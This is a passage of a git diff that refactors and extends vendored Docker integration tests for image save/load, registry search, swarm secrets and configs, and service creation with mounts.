 	err := json.Unmarshal([]byte(out), &data)
 	c.Assert(err, checker.IsNil, check.Commentf("failed to marshal from %q: err %v", repoName, err))
 	c.Assert(len(data), checker.Not(checker.Equals), 0, check.Commentf("failed to marshal the data from %q", repoName))
 	tarTvTimeFormat := "2006-01-02 15:04"
-	out, _, err = runCommandPipelineWithOutput(
+	out, err = RunCommandPipelineWithOutput(
 		exec.Command(dockerBinary, "save", repoName),
 		exec.Command("tar", "tv"),
 		exec.Command("grep", "-E", fmt.Sprintf("%s %s", data[0].Created.Format(tarTvTimeFormat), digest.Digest(data[0].ID).Hex())))
@@ -158,7 +166,7 @@ func (s *DockerSuite) TestSaveAndLoadRepoFlags(c *check.C) {
 
 	before, _ := dockerCmd(c, "inspect", repoName)
 
-	out, _, err := runCommandPipelineWithOutput(
+	out, err := RunCommandPipelineWithOutput(
 		exec.Command(dockerBinary, "save", repoName),
 		exec.Command(dockerBinary, "load"))
 	c.Assert(err, checker.IsNil, check.Commentf("failed to save and load repo: %s, %v", out, err))
@@ -187,7 +195,7 @@ func (s *DockerSuite) TestSaveMultipleNames(c *check.C) {
 	// Make two images
 	dockerCmd(c, "tag", "emptyfs:latest", fmt.Sprintf("%v-two:latest", repoName))
 
-	out, _, err := runCommandPipelineWithOutput(
+	out, err := RunCommandPipelineWithOutput(
 		exec.Command(dockerBinary, "save", fmt.Sprintf("%v-one", repoName), fmt.Sprintf("%v-two:latest", repoName)),
 		exec.Command("tar", "xO", "repositories"),
 		exec.Command("grep", "-q", "-E", "(-one|-two)"),
@@ -219,7 +227,7 @@ func (s *DockerSuite) TestSaveRepoWithMultipleImages(c *check.C) {
 	deleteImages(repoName)
 
 	// create the archive
-	out, _, err := runCommandPipelineWithOutput(
+	out, err := RunCommandPipelineWithOutput(
 		exec.Command(dockerBinary, "save", repoName, "busybox:latest"),
 		exec.Command("tar", "t"))
 	c.Assert(err, checker.IsNil, check.Commentf("failed to save multiple images: %s, %v", out, err))
@@ -259,14 +267,11 @@ func (s *DockerSuite) TestSaveDirectoryPermissions(c *check.C) {
 	os.Mkdir(extractionDirectory, 0777)
 
 	defer os.RemoveAll(tmpDir)
-	_, err = buildImage(name,
-		`FROM busybox
+	buildImageSuccessfully(c, name, build.WithDockerfile(`FROM busybox
 	RUN adduser -D user && mkdir -p /opt/a/b && chown -R user:user /opt/a
-	RUN touch /opt/a/b/c && chown user:user /opt/a/b/c`,
-		true)
-	c.Assert(err, checker.IsNil, check.Commentf("%v", err))
+	RUN touch /opt/a/b/c && chown user:user /opt/a/b/c`))
 
-	out, _, err := runCommandPipelineWithOutput(
+	out, err := RunCommandPipelineWithOutput(
 		exec.Command(dockerBinary, "save", name),
 		exec.Command("tar", "-xf", "-", "-C", extractionDirectory),
 	)
@@ -304,13 +309,32 @@ func (s *DockerSuite) TestSaveDirectoryPermissions(c *check.C) {
 
 }
 
+func listTar(f io.Reader) ([]string, error) {
+	tr := tar.NewReader(f)
+	var entries []string
+
+	for {
+		th, err := tr.Next()
+		if err == io.EOF {
+			// end of tar archive
+			return entries, nil
+		}
+		if err != nil {
+			return entries, err
+		}
+		entries = append(entries, th.Name)
+	}
+}
+
 // Test loading a weird image where one of the layers is of zero size.
 // The layer.tar file is actually zero bytes, no padding or anything else.
 // See issue: 18170
 func (s *DockerSuite) TestLoadZeroSizeLayer(c *check.C) {
-	testRequires(c, DaemonIsLinux)
+	// this will definitely not work if using remote daemon
+	// very weird test
+	testRequires(c, DaemonIsLinux, SameHostDaemon)
 
-	dockerCmd(c, "load", "-i", "fixtures/load/emptyLayer.tar")
+	dockerCmd(c, "load", "-i", "testdata/emptyLayer.tar")
 }
 
 func (s *DockerSuite) TestSaveLoadParents(c *check.C) {
@@ -357,13 +381,11 @@ func (s *DockerSuite) TestSaveLoadNoTag(c *check.C) {
 
 	name := "saveloadnotag"
 
-	_, err := buildImage(name, "FROM busybox\nENV foo=bar", true)
-	c.Assert(err, checker.IsNil, check.Commentf("%v", err))
-
+	buildImageSuccessfully(c, name, build.WithDockerfile("FROM busybox\nENV foo=bar"))
 	id := inspectField(c, name, "Id")
 
 	// Test to make sure that save w/o name just shows imageID during load
-	out, _, err := runCommandPipelineWithOutput(
+	out, err := RunCommandPipelineWithOutput(
 		exec.Command(dockerBinary, "save", id),
 		exec.Command(dockerBinary, "load"))
 	c.Assert(err, checker.IsNil, check.Commentf("failed to save and load repo: %s, %v", out, err))
@@ -374,7 +396,7 @@ func (s *DockerSuite) TestSaveLoadNoTag(c *check.C) {
 	c.Assert(out, checker.Contains, id)
 
 	// Test to make sure that save by name shows that name during load
-	out, _, err = runCommandPipelineWithOutput(
+	out, err = RunCommandPipelineWithOutput(
 		exec.Command(dockerBinary, "save", name),
 		exec.Command(dockerBinary, "load"))
 	c.Assert(err, checker.IsNil, check.Commentf("failed to save and load repo: %s, %v", out, err))
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_save_load_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_save_load_unix_test.go
index 22445e5bbe..da520e41c0 100644
--- a/vendor/github.com/docker/docker/integration-cli/docker_cli_save_load_unix_test.go
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_save_load_unix_test.go
@@ -11,9 +11,11 @@ import (
 	"strings"
 	"time"
 
-	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/docker/docker/integration-cli/checker"
+	"github.com/docker/docker/integration-cli/cli/build"
 	"github.com/go-check/check"
 	"github.com/kr/pty"
+	"gotest.tools/icmd"
 )
 
 // save a repo and try to load it using stdout
@@ -29,11 +31,10 @@ func (s *DockerSuite) TestSaveAndLoadRepoStdout(c *check.C) {
 	c.Assert(err, check.IsNil)
 	defer os.Remove(tmpFile.Name())
 
-	saveCmd := exec.Command(dockerBinary, "save", repoName)
-	saveCmd.Stdout = tmpFile
-
-	_, err = runCommand(saveCmd)
-	c.Assert(err, check.IsNil)
+	icmd.RunCmd(icmd.Cmd{
+		Command: []string{dockerBinary, "save", repoName},
+		Stdout:  tmpFile,
+	}).Assert(c, icmd.Success)
 
 	tmpFile, err = os.Open(tmpFile.Name())
 	c.Assert(err, check.IsNil)
@@ -41,11 +42,10 @@ func (s *DockerSuite) TestSaveAndLoadRepoStdout(c *check.C) {
 
 	deleteImages(repoName)
 
-	loadCmd := exec.Command(dockerBinary, "load")
-	loadCmd.Stdin = tmpFile
-
-	out, _, err := runCommandWithOutput(loadCmd)
-	c.Assert(err, check.IsNil, check.Commentf(out))
+	icmd.RunCmd(icmd.Cmd{
+		Command: []string{dockerBinary, "load"},
+		Stdin:   tmpFile,
+	}).Assert(c, icmd.Success)
 
 	after := inspectField(c, repoName, "Id")
 	after = strings.TrimRight(after, "\n")
@@ -67,16 +67,14 @@ func (s *DockerSuite) TestSaveAndLoadRepoStdout(c *check.C) {
 
 	n, err := pty.Read(buf)
 	c.Assert(err, check.IsNil) //could not read tty output
-	c.Assert(string(buf[:n]), checker.Contains, "Cowardly refusing", check.Commentf("help output is not being yielded", out))
+	c.Assert(string(buf[:n]), checker.Contains, "cowardly refusing", check.Commentf("help output is not being yielded"))
 }
 
 func (s *DockerSuite) TestSaveAndLoadWithProgressBar(c *check.C) {
 	name := "test-load"
-	_, err := buildImage(name, `
-	FROM busybox
+	buildImageSuccessfully(c, name, build.WithDockerfile(`FROM busybox
 	RUN touch aa
-	`, true)
-	c.Assert(err, check.IsNil)
+	`))
 
 	tmptar := name + ".tar"
 	dockerCmd(c, "save", "-o", tmptar, name)
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_search_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_search_test.go
index 5a32f2ab93..2c3312d9e9 100644
--- a/vendor/github.com/docker/docker/integration-cli/docker_cli_search_test.go
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_search_test.go
@@ -4,7 +4,7 @@ import (
 	"fmt"
 	"strings"
 
-	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/docker/docker/integration-cli/checker"
 	"github.com/go-check/check"
 )
 
@@ -122,10 +122,10 @@ func (s *DockerSuite) TestSearchWithLimit(c *check.C) {
 	c.Assert(outSlice, checker.HasLen, limit+2) // 1 header, 1 carriage return
 
 	limit = 0
-	out, _, err = dockerCmdWithError("search", fmt.Sprintf("--limit=%d", limit), "docker")
+	_, _, err = dockerCmdWithError("search", fmt.Sprintf("--limit=%d", limit), "docker")
 	c.Assert(err, checker.Not(checker.IsNil))
 
 	limit = 200
-	out, _, err = dockerCmdWithError("search", fmt.Sprintf("--limit=%d", limit), "docker")
+	_, _, err = dockerCmdWithError("search", fmt.Sprintf("--limit=%d", limit), "docker")
 	c.Assert(err, checker.Not(checker.IsNil))
 }
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_secret_create_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_secret_create_test.go
index b79fdbeb59..a807e4e7e7 100644
--- a/vendor/github.com/docker/docker/integration-cli/docker_cli_secret_create_test.go
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_secret_create_test.go
@@ -8,67 +8,28 @@ import (
 	"strings"
 
 	"github.com/docker/docker/api/types/swarm"
-	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/docker/docker/integration-cli/checker"
 	"github.com/go-check/check"
 )
 
-func (s *DockerSwarmSuite) TestSecretCreate(c *check.C) {
-	d := s.AddDaemon(c, true, true)
-
-	testName := "test_secret"
-	id := d.createSecret(c, swarm.SecretSpec{
-		swarm.Annotations{
-			Name: testName,
-		},
-		[]byte("TESTINGDATA"),
-	})
-	c.Assert(id, checker.Not(checker.Equals), "", check.Commentf("secrets: %s", id))
-
-	secret := d.getSecret(c, id)
-	c.Assert(secret.Spec.Name, checker.Equals, testName)
-}
-
-func (s *DockerSwarmSuite) TestSecretCreateWithLabels(c *check.C) {
-	d := s.AddDaemon(c, true, true)
-
-	testName := "test_secret"
-	id := d.createSecret(c, swarm.SecretSpec{
-		swarm.Annotations{
-			Name: testName,
-			Labels: map[string]string{
-				"key1": "value1",
-				"key2": "value2",
-			},
-		},
-		[]byte("TESTINGDATA"),
-	})
-	c.Assert(id, checker.Not(checker.Equals), "", check.Commentf("secrets: %s", id))
-
-	secret := d.getSecret(c, id)
-	c.Assert(secret.Spec.Name, checker.Equals, testName)
-	c.Assert(len(secret.Spec.Labels), checker.Equals, 2)
-	c.Assert(secret.Spec.Labels["key1"], checker.Equals, "value1")
-	c.Assert(secret.Spec.Labels["key2"], checker.Equals, "value2")
-}
-
 // Test case for 28884
 func (s *DockerSwarmSuite) TestSecretCreateResolve(c *check.C) {
 	d := s.AddDaemon(c, true, true)
 
-	name := "foo"
-	id := d.createSecret(c, swarm.SecretSpec{
-		swarm.Annotations{
+	name := "test_secret"
+	id := d.CreateSecret(c, swarm.SecretSpec{
+		Annotations: swarm.Annotations{
 			Name: name,
 		},
-		[]byte("foo"),
+		Data: []byte("foo"),
 	})
 	c.Assert(id, checker.Not(checker.Equals), "", check.Commentf("secrets: %s", id))
 
-	fake := d.createSecret(c, swarm.SecretSpec{
-		swarm.Annotations{
+	fake := d.CreateSecret(c, swarm.SecretSpec{
+		Annotations: swarm.Annotations{
 			Name: id,
 		},
-		[]byte("fake foo"),
+		Data: []byte("fake foo"),
 	})
 	c.Assert(fake, checker.Not(checker.Equals), "", check.Commentf("secrets: %s", fake))
 
@@ -101,7 +62,7 @@ func (s *DockerSwarmSuite) TestSecretCreateResolve(c *check.C) {
 
 	// Remove based on ID prefix of the fake one should succeed
 	out, err = d.Cmd("secret", "rm", fake[:5])
-	c.Assert(out, checker.Contains, fake)
+	c.Assert(out, checker.Contains, fake[:5])
 	out, err = d.Cmd("secret", "ls")
 	c.Assert(err, checker.IsNil)
 	c.Assert(out, checker.Not(checker.Contains), name)
@@ -126,6 +87,6 @@ func (s *DockerSwarmSuite) TestSecretCreateWithFile(c *check.C) {
 	c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "", check.Commentf(out))
 
 	id := strings.TrimSpace(out)
-	secret := d.getSecret(c, id)
+	secret := d.GetSecret(c, id)
 	c.Assert(secret.Spec.Name, checker.Equals, testName)
 }
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_secret_inspect_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_secret_inspect_test.go
deleted file mode 100644
index 0985a2bd59..0000000000
--- a/vendor/github.com/docker/docker/integration-cli/docker_cli_secret_inspect_test.go
+++ /dev/null
@@ -1,68 +0,0 @@
-// +build !windows
-
-package main
-
-import (
-	"encoding/json"
-
-	"github.com/docker/docker/api/types/swarm"
-	"github.com/docker/docker/pkg/integration/checker"
-	"github.com/go-check/check"
-)
-
-func (s *DockerSwarmSuite) TestSecretInspect(c *check.C) {
-	d := s.AddDaemon(c, true, true)
-
-	testName := "test_secret"
-	id := d.createSecret(c, swarm.SecretSpec{
-		swarm.Annotations{
-			Name: testName,
-		},
-		[]byte("TESTINGDATA"),
-	})
-	c.Assert(id, checker.Not(checker.Equals), "", check.Commentf("secrets: %s", id))
-
-	secret := d.getSecret(c, id)
-	c.Assert(secret.Spec.Name, checker.Equals, testName)
-
-	out, err := d.Cmd("secret", "inspect", testName)
-	c.Assert(err, checker.IsNil, check.Commentf(out))
-
-	var secrets []swarm.Secret
-	c.Assert(json.Unmarshal([]byte(out), &secrets), checker.IsNil)
-	c.Assert(secrets, checker.HasLen, 1)
-}
-
-func (s *DockerSwarmSuite) TestSecretInspectMultiple(c *check.C) {
-	d := s.AddDaemon(c, true, true)
-
-	testNames := []string{
-		"test0",
-		"test1",
-	}
-	for _, n := range testNames {
-		id := d.createSecret(c, swarm.SecretSpec{
-			swarm.Annotations{
-				Name: n,
-			},
-			[]byte("TESTINGDATA"),
-		})
-		c.Assert(id, checker.Not(checker.Equals), "", check.Commentf("secrets: %s", id))
-
-		secret := d.getSecret(c, id)
-		c.Assert(secret.Spec.Name, checker.Equals, n)
-
-	}
-
-	args := []string{
-		"secret",
-		"inspect",
-	}
-	args = append(args, testNames...)
-	out, err := d.Cmd(args...)
-	c.Assert(err, checker.IsNil, check.Commentf(out))
-
-	var secrets []swarm.Secret
-	c.Assert(json.Unmarshal([]byte(out), &secrets), checker.IsNil)
-	c.Assert(secrets, checker.HasLen, 2)
-}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_service_create_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_service_create_test.go
index 9e8b1e9956..d690b7e45f 100644
--- a/vendor/github.com/docker/docker/integration-cli/docker_cli_service_create_test.go
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_service_create_test.go
@@ -5,33 +5,34 @@ package main
 import (
 	"encoding/json"
 	"fmt"
+	"path/filepath"
 	"strings"
 
 	"github.com/docker/docker/api/types"
 	"github.com/docker/docker/api/types/mount"
 	"github.com/docker/docker/api/types/swarm"
-	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/docker/docker/integration-cli/checker"
 	"github.com/go-check/check"
 )
 
 func (s *DockerSwarmSuite) TestServiceCreateMountVolume(c *check.C) {
 	d := s.AddDaemon(c, true, true)
-	out, err := d.Cmd("service", "create", "--mount", "type=volume,source=foo,target=/foo,volume-nocopy", "busybox", "top")
+	out, err := d.Cmd("service", "create", "--no-resolve-image", "--detach=true", "--mount", "type=volume,source=foo,target=/foo,volume-nocopy", "busybox", "top")
 	c.Assert(err, checker.IsNil, check.Commentf(out))
 	id := strings.TrimSpace(out)
 
 	var tasks []swarm.Task
 	waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) {
-		tasks = d.getServiceTasks(c, id)
+		tasks = d.GetServiceTasks(c, id)
 		return len(tasks) > 0, nil
 	}, checker.Equals, true)
 
 	task := tasks[0]
 	waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) {
-		if task.NodeID == "" || task.Status.ContainerStatus.ContainerID == "" {
-			task = d.getTask(c, task.ID)
+		if task.NodeID == "" || task.Status.ContainerStatus == nil {
+			task = d.GetTask(c, task.ID)
 		}
-		return task.NodeID != "" && task.Status.ContainerStatus.ContainerID != "", nil
+		return task.NodeID != "" && task.Status.ContainerStatus != nil, nil
 	}, checker.Equals, true)
 
 	// check container mount config
@@ -67,15 +68,15 @@ func (s *DockerSwarmSuite) TestServiceCreateWithSecretSimple(c *check.C) {
 
 	serviceName := "test-service-secret"
 	testName := "test_secret"
-	id := d.createSecret(c, swarm.SecretSpec{
-		swarm.Annotations{
+	id := d.CreateSecret(c, swarm.SecretSpec{
+		Annotations: swarm.Annotations{
 			Name: testName,
 		},
-		[]byte("TESTINGDATA"),
+		Data: []byte("TESTINGDATA"),
 	})
 	c.Assert(id, checker.Not(checker.Equals), "", check.Commentf("secrets: %s", id))
 
-	out, err := d.Cmd("service", "create", "--name", serviceName, "--secret", testName, "busybox", "top")
+	out, err := d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", serviceName, "--secret", testName, "busybox", "top")
 	c.Assert(err, checker.IsNil, check.Commentf(out))
 
 	out, err = d.Cmd("service", "inspect", "--format", "{{ json .Spec.TaskTemplate.ContainerSpec.Secrets }}", serviceName)
@@ -90,23 +91,91 @@ func (s *DockerSwarmSuite) TestServiceCreateWithSecretSimple(c *check.C) {
 	c.Assert(refs[0].File.Name, checker.Equals, testName)
 	c.Assert(refs[0].File.UID, checker.Equals, "0")
 	c.Assert(refs[0].File.GID, checker.Equals, "0")
+
+	out, err = d.Cmd("service", "rm", serviceName)
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+	d.DeleteSecret(c, testName)
 }
 
-func (s *DockerSwarmSuite) TestServiceCreateWithSecretSourceTarget(c *check.C) {
+func (s *DockerSwarmSuite) TestServiceCreateWithSecretSourceTargetPaths(c *check.C) {
 	d := s.AddDaemon(c, true, true)
 
-	serviceName := "test-service-secret"
-	testName := "test_secret"
-	id := d.createSecret(c, swarm.SecretSpec{
-		swarm.Annotations{
-			Name: testName,
+	testPaths := map[string]string{
+		"app":                  "/etc/secret",
+		"test_secret":          "test_secret",
+		"relative_secret":      "relative/secret",
+		"escapes_in_container": "../secret",
+	}
+
+	var secretFlags []string
+
+	for testName, testTarget := range testPaths {
+		id := d.CreateSecret(c, swarm.SecretSpec{
+			Annotations: swarm.Annotations{
+				Name: testName,
+			},
+			Data: []byte("TESTINGDATA " + testName + " " + testTarget),
+		})
+		c.Assert(id, checker.Not(checker.Equals), "", check.Commentf("secrets: %s", id))
+
+		secretFlags = append(secretFlags, "--secret", fmt.Sprintf("source=%s,target=%s", testName, testTarget))
+	}
+
+	serviceName := "svc"
+	serviceCmd := []string{"service", "create", "--detach", "--no-resolve-image", "--name", serviceName}
+	serviceCmd = append(serviceCmd, secretFlags...)
+	serviceCmd = append(serviceCmd, "busybox", "top")
+	out, err := d.Cmd(serviceCmd...)
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+
+	out, err = d.Cmd("service", "inspect", "--format", "{{ json .Spec.TaskTemplate.ContainerSpec.Secrets }}", serviceName)
+	c.Assert(err, checker.IsNil)
+
+	var refs []swarm.SecretReference
+	c.Assert(json.Unmarshal([]byte(out), &refs), checker.IsNil)
+	c.Assert(refs, checker.HasLen, len(testPaths))
+
+	var tasks []swarm.Task
+	waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) {
+		tasks = d.GetServiceTasks(c, serviceName)
+		return len(tasks) > 0, nil
+	}, checker.Equals, true)
+
+	task := tasks[0]
+	waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) {
+		if task.NodeID == "" || task.Status.ContainerStatus == nil {
+			task = d.GetTask(c, task.ID)
+		}
+		return task.NodeID != "" && task.Status.ContainerStatus != nil, nil
+	}, checker.Equals, true)
+
+	for testName, testTarget := range testPaths {
+		path := testTarget
+		if !filepath.IsAbs(path) {
+			path = filepath.Join("/run/secrets", path)
+		}
+		out, err := d.Cmd("exec", task.Status.ContainerStatus.ContainerID, "cat", path)
+		c.Assert(err, checker.IsNil)
+		c.Assert(out, checker.Equals, "TESTINGDATA "+testName+" "+testTarget)
+	}
+
+	out, err = d.Cmd("service", "rm", serviceName)
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+}
+
+func (s *DockerSwarmSuite) TestServiceCreateWithSecretReferencedTwice(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+
+	id := d.CreateSecret(c, swarm.SecretSpec{
+		Annotations: swarm.Annotations{
+			Name: "mysecret",
 		},
-		[]byte("TESTINGDATA"),
+		Data: []byte("TESTINGDATA"),
 	})
 	c.Assert(id, checker.Not(checker.Equals), "", check.Commentf("secrets: %s", id))
-	testTarget := "testing"
 
-	out, err := d.Cmd("service", "create", "--name", serviceName, "--secret", fmt.Sprintf("source=%s,target=%s", testName, testTarget), "busybox", "top")
+	serviceName := "svc"
+	out, err := d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", serviceName, "--secret", "source=mysecret,target=target1", "--secret", "source=mysecret,target=target2", "busybox", "top")
 	c.Assert(err, checker.IsNil, check.Commentf(out))
 
 	out, err = d.Cmd("service", "inspect", "--format", "{{ json .Spec.TaskTemplate.ContainerSpec.Secrets }}", serviceName)
@@ -114,31 +183,199 @@ func (s *DockerSwarmSuite) TestServiceCreateWithSecretSourceTarget(c *check.C) {
 
 	var refs []swarm.SecretReference
 	c.Assert(json.Unmarshal([]byte(out), &refs), checker.IsNil)
+	c.Assert(refs, checker.HasLen, 2)
+
+	var tasks []swarm.Task
+	waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) {
+		tasks = d.GetServiceTasks(c, serviceName)
+		return len(tasks) > 0, nil
+	}, checker.Equals, true)
+
+	task := tasks[0]
+	waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) {
+		if task.NodeID == "" || task.Status.ContainerStatus == nil {
+			task = d.GetTask(c, task.ID)
+		}
+		return task.NodeID != "" && task.Status.ContainerStatus != nil, nil
+	}, checker.Equals, true)
+
+	for _, target := range []string{"target1", "target2"} {
+		c.Assert(err, checker.IsNil, check.Commentf(out))
+		path := filepath.Join("/run/secrets", target)
+		out, err := d.Cmd("exec", task.Status.ContainerStatus.ContainerID, "cat", path)
+		c.Assert(err, checker.IsNil)
+		c.Assert(out, checker.Equals, "TESTINGDATA")
+	}
+
+	out, err = d.Cmd("service", "rm", serviceName)
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+}
+
+func (s *DockerSwarmSuite) TestServiceCreateWithConfigSimple(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+
+	serviceName := "test-service-config"
+	testName := "test_config"
+	id := d.CreateConfig(c, swarm.ConfigSpec{
+		Annotations: swarm.Annotations{
+			Name: testName,
+		},
+		Data: []byte("TESTINGDATA"),
+	})
+	c.Assert(id, checker.Not(checker.Equals), "", check.Commentf("configs: %s", id))
+
+	out, err := d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", serviceName, "--config", testName, "busybox", "top")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+
+	out, err = d.Cmd("service", "inspect", "--format", "{{ json .Spec.TaskTemplate.ContainerSpec.Configs }}", serviceName)
+	c.Assert(err, checker.IsNil)
+
+	var refs []swarm.ConfigReference
+	c.Assert(json.Unmarshal([]byte(out), &refs), checker.IsNil)
 	c.Assert(refs, checker.HasLen, 1)
 
-	c.Assert(refs[0].SecretName, checker.Equals, testName)
+	c.Assert(refs[0].ConfigName, checker.Equals, testName)
 	c.Assert(refs[0].File, checker.Not(checker.IsNil))
-	c.Assert(refs[0].File.Name, checker.Equals, testTarget)
+	c.Assert(refs[0].File.Name, checker.Equals, testName)
+	c.Assert(refs[0].File.UID, checker.Equals, "0")
+	c.Assert(refs[0].File.GID, checker.Equals, "0")
+
+	out, err = d.Cmd("service", "rm", serviceName)
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+	d.DeleteConfig(c, testName)
+}
+
+func (s *DockerSwarmSuite) TestServiceCreateWithConfigSourceTargetPaths(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+
+	testPaths := map[string]string{
+		"app":             "/etc/config",
+		"test_config":     "test_config",
+		"relative_config": "relative/config",
+	}
+
+	var configFlags []string
+
+	for testName, testTarget := range testPaths {
+		id := d.CreateConfig(c, swarm.ConfigSpec{
+			Annotations: swarm.Annotations{
+				Name: testName,
+			},
+			Data: []byte("TESTINGDATA " + testName + " " + testTarget),
+		})
+		c.Assert(id, checker.Not(checker.Equals), "", check.Commentf("configs: %s", id))
+
+		configFlags = append(configFlags, "--config", fmt.Sprintf("source=%s,target=%s", testName, testTarget))
+	}
+
+	serviceName := "svc"
+	serviceCmd := []string{"service", "create", "--detach", "--no-resolve-image", "--name", serviceName}
+	serviceCmd = append(serviceCmd, configFlags...)
+	serviceCmd = append(serviceCmd, "busybox", "top")
+	out, err := d.Cmd(serviceCmd...)
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+
+	out, err = d.Cmd("service", "inspect", "--format", "{{ json .Spec.TaskTemplate.ContainerSpec.Configs }}", serviceName)
+	c.Assert(err, checker.IsNil)
+
+	var refs []swarm.ConfigReference
+	c.Assert(json.Unmarshal([]byte(out), &refs), checker.IsNil)
+	c.Assert(refs, checker.HasLen, len(testPaths))
+
+	var tasks []swarm.Task
+	waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) {
+		tasks = d.GetServiceTasks(c, serviceName)
+		return len(tasks) > 0, nil
+	}, checker.Equals, true)
+
+	task := tasks[0]
+	waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) {
+		if task.NodeID == "" || task.Status.ContainerStatus == nil {
+			task = d.GetTask(c, task.ID)
+		}
+		return task.NodeID != "" && task.Status.ContainerStatus != nil, nil
+	}, checker.Equals, true)
+
+	for testName, testTarget := range testPaths {
+		path := testTarget
+		if !filepath.IsAbs(path) {
+			path = filepath.Join("/", path)
+		}
+		out, err := d.Cmd("exec", task.Status.ContainerStatus.ContainerID, "cat", path)
+		c.Assert(err, checker.IsNil)
+		c.Assert(out, checker.Equals, "TESTINGDATA "+testName+" "+testTarget)
+	}
+
+	out, err = d.Cmd("service", "rm", serviceName)
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+}
+
+func (s *DockerSwarmSuite) TestServiceCreateWithConfigReferencedTwice(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+
+	id := d.CreateConfig(c, swarm.ConfigSpec{
+		Annotations: swarm.Annotations{
+			Name: "myconfig",
+		},
+		Data: []byte("TESTINGDATA"),
+	})
+	c.Assert(id, checker.Not(checker.Equals), "", check.Commentf("configs: %s", id))
+
+	serviceName := "svc"
+	out, err := d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", serviceName, "--config", "source=myconfig,target=target1", "--config", "source=myconfig,target=target2", "busybox", "top")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+
+	out, err = d.Cmd("service", "inspect", "--format", "{{ json .Spec.TaskTemplate.ContainerSpec.Configs }}", serviceName)
+	c.Assert(err, checker.IsNil)
+
+	var refs []swarm.ConfigReference
+	c.Assert(json.Unmarshal([]byte(out), &refs), checker.IsNil)
+	c.Assert(refs, checker.HasLen, 2)
+
+	var tasks []swarm.Task
+	waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) {
+		tasks = d.GetServiceTasks(c, serviceName)
+		return len(tasks) > 0, nil
+	}, checker.Equals, true)
+
+	task := tasks[0]
+	waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) {
+		if task.NodeID == "" || task.Status.ContainerStatus == nil {
+			task = d.GetTask(c, task.ID)
+		}
+		return task.NodeID != "" && task.Status.ContainerStatus != nil, nil
+	}, checker.Equals, true)
+
+	for _, target := range []string{"target1", "target2"} {
+		c.Assert(err, checker.IsNil, check.Commentf(out))
+		path := filepath.Join("/", target)
+		out, err := d.Cmd("exec", task.Status.ContainerStatus.ContainerID, "cat", path)
+		c.Assert(err, checker.IsNil)
+		c.Assert(out, checker.Equals, "TESTINGDATA")
+	}
+
+	out, err = d.Cmd("service", "rm", serviceName)
+	c.Assert(err, checker.IsNil, check.Commentf(out))
 }
 
 func (s *DockerSwarmSuite) TestServiceCreateMountTmpfs(c *check.C) {
 	d := s.AddDaemon(c, true, true)
-	out, err := d.Cmd("service", "create", "--mount", "type=tmpfs,target=/foo,tmpfs-size=1MB", "busybox", "sh", "-c", "mount | grep foo; tail -f /dev/null")
+	out, err := d.Cmd("service", "create", "--no-resolve-image", "--detach=true", "--mount", "type=tmpfs,target=/foo,tmpfs-size=1MB", "busybox", "sh", "-c", "mount | grep foo; tail -f /dev/null")
 	c.Assert(err, checker.IsNil, check.Commentf(out))
 	id := strings.TrimSpace(out)
 
 	var tasks []swarm.Task
 	waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) {
-		tasks = d.getServiceTasks(c, id)
+		tasks = d.GetServiceTasks(c, id)
 		return len(tasks) > 0, nil
 	}, checker.Equals, true)
 
 	task := tasks[0]
 	waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) {
-		if task.NodeID == "" || task.Status.ContainerStatus.ContainerID == "" {
-			task = d.getTask(c, task.ID)
+		if task.NodeID == "" || task.Status.ContainerStatus == nil {
+			task = d.GetTask(c, task.ID)
 		}
-		return task.NodeID != "" && task.Status.ContainerStatus.ContainerID != "", nil
+		return task.NodeID != "" && task.Status.ContainerStatus != nil, nil
 	}, checker.Equals, true)
 
 	// check container mount config
